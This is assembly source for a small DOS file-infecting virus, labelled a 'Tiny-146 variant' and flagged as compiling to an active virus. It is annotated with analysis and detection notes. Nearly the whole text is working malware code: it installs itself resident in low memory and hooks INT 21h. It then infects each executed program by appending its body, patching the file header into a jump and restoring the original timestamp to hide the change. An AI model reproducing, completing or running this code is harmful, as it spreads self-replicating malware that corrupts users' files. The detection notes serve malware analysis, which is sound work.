; Tiny-146 virus variant - by Tara K. Allen
; COMPILES TO ACTIVE VIRUS!!! BE CAREFUL!!!
; Text-macro shorthands used by the rest of the listing.
o equ <offset>
b equ <byte ptr>
w equ <word ptr>
; Fixed offset in segment 0000h used by the resident copy: a 4-byte buffer
; lives at 0000:BASE and the copied code starts at 0000:BASE+4.
; Analysis note: a fixed, hard-coded residency address is a stable indicator
; for memory scanning.
BASE equ 0504h ; Base offset in low memory
.model tiny
.code
.186 ; pusha/popa below need the 186 instruction set
org 0100h ; code is assembled for offset 0100h
; First-generation header, laid out the same way as the 4-byte header the
; handler writes into a target file: marker byte 4Dh, opcode E9h (near jmp),
; and a 16-bit displacement. Here the displacement is 4, which skips the
; `bytes` buffer and lands on `virus`.
; Analysis note: the leading 4Dh is also what the handler tests for before
; modifying a file, so a file starting 4Dh E9h matches the header built in
; this listing.
start: db 04Dh ; marker byte ('M'); it executes as a one-byte instruction
db 0E9h,004h,000h ; jmp virus (near version)
; Saved "original first 4 bytes" of the host. In this first generation they
; encode mov ah,4Ch / int 21h, so the restored host just terminates.
bytes db 0B4h,04Ch,0CDh,021h
; Entry stub reached through the 4-byte header. It restores the host's saved
; first 4 bytes in memory, installs the resident copy if it is not already
; present, and then transfers control to the host.
; Analysis notes (detection / triage):
;   - the residency check and the resident copy both use 0000:BASE+4
;   - after install, the INT 21h vector points into segment 0000h and the
;     INT 32h vector slot holds the previous INT 21h handler
; NOTE(review): the code relies on SI holding the program start offset on
; entry (the "base pointer"); nothing in this file sets SI - confirm against
; the loader being analysed.
virus: pusha ; save all registers (restored by popa before the final jmp)
mov di, si ; di = program start, destination for the restored bytes
add si, [si+2] ; add the displacement word stored at start+2 -> si = saved `bytes`
movsw
movsw ; 4 saved bytes copied back over the header; si now = virus
xor cx, cx ; cx = 0
mov es, cx ; es = segment 0000h
mov di, BASE+4 ; es:di = resident position of the code
cmpsb ; compare first code byte with 0000:BASE+4 - already installed?
je done
dec si ; undo the cmpsb increments, then copy virus to low memory
dec di
mov cl, o(virend)-o(bytes) ; cx = byte count (ch is still 0)
rep movsb
mov di, 32h*4 ; es:di = interrupt vector 32h
xchg ax, cx ; ax = 0 (cx was counted down to 0 by rep movsb) = handler segment
mov cx, BASE+o(int21)-o(bytes) ; cx = offset of the resident int21 handler
; Two passes: the first handles the offset word, the second the segment word.
; Each pass swaps the new value into the INT 21h entry (di-11h*4 = 21h*4) and
; stores the value that was there into the INT 32h entry with stosw.
sloop: xchg ax, cx ; install interrupt vector
xchg ax, es:[di-11h*4]
stosw
jcxz sloop ; cx = 0 (new segment) after pass one; afterwards cx = old INT 21h offset, presumably non-zero
done: push ds ; restore registers
pop es ; es = ds again
popa
jmp si ; jump to start (si is the entry value restored by popa)
; Resident INT 21h hook. Every request other than AX=4B00h is passed straight
; to the previous handler. For AX=4B00h it opens the file read/write, reads
; its first 4 bytes into 0000:BASE, and skips the file if the first byte is
; 4Dh. Otherwise it appends o(virend)-o(bytes) bytes from 0000:BASE (the 4
; saved bytes followed by the code) at end of file and overwrites the first
; 4 bytes with 4Dh, E9h and the low word of the old file size. All DOS calls
; go through INT 32h, whose vector slot holds the previous INT 21h handler.
; Analysis notes (detection / triage):
;   - modified files start with 4Dh E9h and grow by o(virend)-o(bytes) bytes
;   - the original date/time stamp is written back, so the timestamp is not a
;     reliable sign of modification
;   - none of the read/seek/write calls after the open is checked for errors
; NOTE(review): ds:dx is not loaded here; presumably it still holds the
; file-name pointer supplied by the caller of the exec request - confirm.
int21: cmp ax, 4B00h ; if not exec, then exit
jne ijmp
pusha ; save all registers
push ds
mov ax, 3D02h ; open the file
int 32h
jc idone ; jump if error (nothing has been pushed beyond pusha/ds yet)
xchg bx, ax ; bx = handle
push cs ; ds = cs = 0
pop ds
mov di, BASE ; bytes array is at 0000:BASE
mov ax, 5700h ; get date and time
int 32h
push cx ; save date and time
push dx
mov ah, 3Fh ; read original bytes
mov cx, 4 ; 4 bytes, into the buffer at 0000:BASE
call ifile
cmp b [di], 4Dh ; check for .exe or already installed
je iclose
mov ax, 4202h ; seek to end of file (cx:dx = 0 after ifile)
int 32h
xchg ax, si ; si = file size (low word of the returned position)
mov ah, 40h ; write body of virus to file
mov cl, o(virend)-o(bytes) ; cx = length (ifile left cx = 0)
call ifile
mov w [di], 0E94Dh ; set up virus header: bytes 4Dh, E9h
mov w [di+2], si ; displacement word = old file size
mov ax, 4200h ; seek to start of file
int 32h
mov ah, 40h ; write virus header to file
mov cl, 4
call ifile
iclose: pop dx ; restore original date and time
pop cx
mov ax, 5701h ; set date and time
int 32h
mov ah, 3Eh ; close the file
int 32h
idone: pop ds ; restore registers, jmp to old int
popa
; cs is 0 here (see "ds = cs = 0" above), so this reads the far pointer
; stored in the INT 32h vector slot, i.e. the previous INT 21h handler.
ijmp: jmp dword ptr cs:[32h*4]
; Shared helper for the handler's read and write calls.
; In:  ah = DOS function, bx = handle, cx = byte count, di = buffer offset
;      (the handler passes di = BASE with ds = 0)
; Out: ax = result of the DOS call; cx = 0; dx = sign extension of ax (0 for
;      the small byte counts used here), so the seek calls that follow see
;      cx:dx = 0
ifile: mov dx, di ; dx = bytes array is at 0000:BASE
int 32h ; call the previous INT 21h handler through the INT 32h slot
cwd ; cx:dx = 0
xor cx, cx
ret ; return
; End-of-body marker: the copy and append lengths above are computed as
; o(virend)-o(bytes).
virend:
end start